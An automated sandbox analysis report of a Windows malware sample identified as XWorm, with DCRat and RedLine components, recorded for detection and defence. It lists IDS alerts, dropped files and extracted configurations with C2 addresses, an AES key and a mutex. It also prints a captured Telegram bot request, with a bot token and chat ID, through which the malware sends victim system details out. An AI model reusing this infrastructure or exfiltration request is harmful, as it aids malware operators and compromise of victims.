                                    2025-01-07T18:04:19.126093+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.234940+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.344671+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.453784+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.562958+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.698955+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.815770+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.926937+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.031731+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.141127+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.250411+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.359776+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.469224+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.592686+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.703557+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.812963+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.930463+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.031710+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.141044+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.260217+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.375936+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.487292+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.594783+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.704004+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.813164+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.938035+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.050278+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.156932+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.282853+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.391202+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.500528+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.611632+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.719160+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.828475+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.938113+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.047456+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.156855+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.266456+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.375485+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.492711+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.610512+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.722000+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.828875+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.941020+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.054932+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.166116+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.281666+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.414600+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.516442+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.625445+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.734901+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.845230+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.981872+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.103499+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.221709+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.352947+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.473002+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.579339+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.689728+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.808761+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.923159+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.071332+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.174677+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.296737+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.423123+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.533252+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.641115+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.750549+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.859856+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.969302+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.078587+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.205136+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.313088+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.422371+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.541471+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.672058+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.781851+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.908406+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.016254+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.125589+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.234936+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.347594+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.453816+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.566313+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.672376+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.781794+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.891660+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:29.028546+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:29.142287+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:29.250788+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:29.359990+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:29.469373+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:29.578758+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-07T18:03:28.966983+010028559241Malware Command and Control Activity Detected192.168.2.74997694.141.122.1617000TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-07T18:04:12.065408+010028531911Malware Command and Control Activity Detected94.141.122.1617000192.168.2.749976TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-07T18:04:11.832339+010028531921Malware Command and Control Activity Detected192.168.2.74997694.141.122.1617000TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-07T18:03:14.080824+010018100071Potentially Bad Traffic192.168.2.749975149.154.167.220443TCP

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: HaLCYOFjMN.exeAvira: detected
                                    Antivirus detection for dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\jxseyegkwF.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Program Files\Windows Mail\System.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXEAvira: detection malicious, Label: TR/Spy.RedLine.hgyva
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Users\user\Desktop\IJgIaehv.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Found malware configuration
                                    Source: HaLCYOFjMN.exeMalware Configuration Extractor: Xworm {"C2 url": ["94.141.122.161"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                                    Source: 00000021.00000002.2642036068.0000000012B3B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://122295cm.n9shteam.in/topollgamelongpoll", "MUTEX": "DCR_MUTEX-ue3JZ8LnyDYDzLQZpNKo"}
                                    Source: 25.0.cnvwov.EXE.6c0000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["94.141.122.161:7771"], "Bot Id": "button1"}
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exeReversingLabs: Detection: 65%
                                    Source: C:\Program Files\Windows Mail\System.exeReversingLabs: Detection: 65%
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXEReversingLabs: Detection: 67%
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeReversingLabs: Detection: 73%
                                    Source: C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exeReversingLabs: Detection: 65%
                                    Source: C:\Users\user\Desktop\IJgIaehv.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\MwyHCbxj.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\cXuwPjHF.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\gOlnWgHy.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\nuSUkZIl.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\poUkcZma.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\zXoALCrI.logReversingLabs: Detection: 20%
                                    Source: C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exeReversingLabs: Detection: 65%
                                    Source: C:\agentwebreviewDhcp\WmiPrvSE.exeReversingLabs: Detection: 65%
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeReversingLabs: Detection: 65%
                                    Multi AV Scanner detection for submitted file
                                    Source: HaLCYOFjMN.exeReversingLabs: Detection: 78%
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\Users\user\AppData\Roaming\Update.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files\Windows Mail\System.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\IJgIaehv.logJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: HaLCYOFjMN.exeJoe Sandbox ML: detected
                                    Sample uses string decryption to hide its real strings
                                    Source: HaLCYOFjMN.exeString decryptor: 94.141.122.161
                                    Source: HaLCYOFjMN.exeString decryptor: 7000
                                    Source: HaLCYOFjMN.exeString decryptor: <123456789>
                                    Source: HaLCYOFjMN.exeString decryptor: <Xwormmm>
                                    Source: HaLCYOFjMN.exeString decryptor: nursultan
                                    Source: HaLCYOFjMN.exeString decryptor: USB.exe
                                    Source: HaLCYOFjMN.exeString decryptor: %AppData%
                                    Source: HaLCYOFjMN.exeString decryptor: Update.exe
                                    Source: 00000021.00000002.2642036068.0000000012B3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"System drive"}}
                                    Source: 00000021.00000002.2642036068.0000000012B3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-ue3JZ8LnyDYDzLQZpNKo","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
                                    Source: 00000021.00000002.2642036068.0000000012B3B000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://122295cm.n9shteam.in/","topollgamelongpoll"]]
                                    Source: HaLCYOFjMN.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDirectory created: C:\Program Files\Windows Mail\System.exe
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDirectory created: C:\Program Files\Windows Mail\27d1bcfc3c54e0
                                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49975 version: TLS 1.2
                                    Source: HaLCYOFjMN.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: rqbprm.exe, 00000018.00000003.2089903896.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, rqbprm.exe, 00000018.00000003.2090975716.000000000736E000.00000004.00000020.00020000.00000000.sdmp, rqbprm.exe, 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp, rqbprm.exe, 00000018.00000000.2086918365.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                    Source: Binary string: ;C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.pdb source: portBrowserweb.exe, 00000021.00000002.2565641894.0000000003024000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: ;C:\Users\user\AppData\Local\Temp\la3xll1v\la3xll1v.pdb source: portBrowserweb.exe, 00000021.00000002.2565641894.0000000003024000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: ;C:\Users\user\AppData\Local\Temp\dqjfixj4\dqjfixj4.pdb source: portBrowserweb.exe, 00000021.00000002.2565641894.0000000003024000.00000004.00000800.00020000.00000000.sdmp

                                    Spreading

                                    barindex
                                    Infects executable files (exe, dll, sys, html)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C6A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,24_2_00C6A69B
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C7C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,24_2_00C7C220
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C8B348 FindFirstFileExA,24_2_00C8B348
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile opened: C:\Users\user\AppData\Local\Temp
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile opened: C:\Users\user
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile opened: C:\Users\user\AppData\Local
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile opened: C:\Users\user\Documents\desktop.ini
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile opened: C:\Users\user\AppData
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile opened: C:\Users\user\Desktop\desktop.ini
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeCode function: 4x nop then jmp 00007FFAAC483BF4h5_2_00007FFAAC4833D1
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeCode function: 4x nop then jmp 00007FFAAC483BF4h5_2_00007FFAAC4833D1

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.7:49982 -> 94.141.122.161:7000
                                    Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.7:49982 -> 94.141.122.161:7000
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49983 -> 104.21.48.1:80
                                    Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49976 -> 94.141.122.161:7000
                                    Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 94.141.122.161:7000 -> 192.168.2.7:49976
                                    Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.7:49976 -> 94.141.122.161:7000
                                    Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 94.141.122.161:7000 -> 192.168.2.7:49976
                                    Source: Network trafficSuricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.7:49976 -> 94.141.122.161:7000
                                    Source: Network trafficSuricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 94.141.122.161:7000 -> 192.168.2.7:49976
                                    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49975 -> 149.154.167.220:443
                                    Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.7:49975 -> 149.154.167.220:443
                                    C2 URLs / IPs found in malware configuration
                                    Source: Malware configuration extractorURLs: 94.141.122.161
                                    Source: Malware configuration extractorURLs: 94.141.122.161:7771
                                    Uses the Telegram API (likely for C&C communication)
                                    Source: unknownDNS query: name: api.telegram.org
                                    Yara detected Generic Downloader
                                    Source: Yara matchFile source: HaLCYOFjMN.exe, type: SAMPLE
                                    Source: Yara matchFile source: 5.0.HaLCYOFjMN.exe.200000.0.unpack, type: UNPACKEDPE
                                    Source: global trafficTCP traffic: 192.168.2.7:49976 -> 94.141.122.161:7000
                                    Source: global trafficHTTP traffic detected: GET /bot7568949165:AAGgQ5jLJjKDrnOV8dm-jnLIdWR-IOeUVTQ/sendMessage?chat_id=7733551555&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A23A5CC5CF533B5EED372%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ST_D6%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20nursultan HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                                    Source: Joe Sandbox ViewASN Name: UNITLINE_RST_NET1RostovnaDonuRU UNITLINE_RST_NET1RostovnaDonuRU
                                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                    Source: unknownDNS query: name: ip-api.com
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.161
                                    Source: global trafficHTTP traffic detected: GET /bot7568949165:AAGgQ5jLJjKDrnOV8dm-jnLIdWR-IOeUVTQ/sendMessage?chat_id=7733551555&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A23A5CC5CF533B5EED372%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ST_D6%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20nursultan HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                    Source: cnvwov.EXE, 00000019.00000002.2108078019.0000000002A66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: #www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
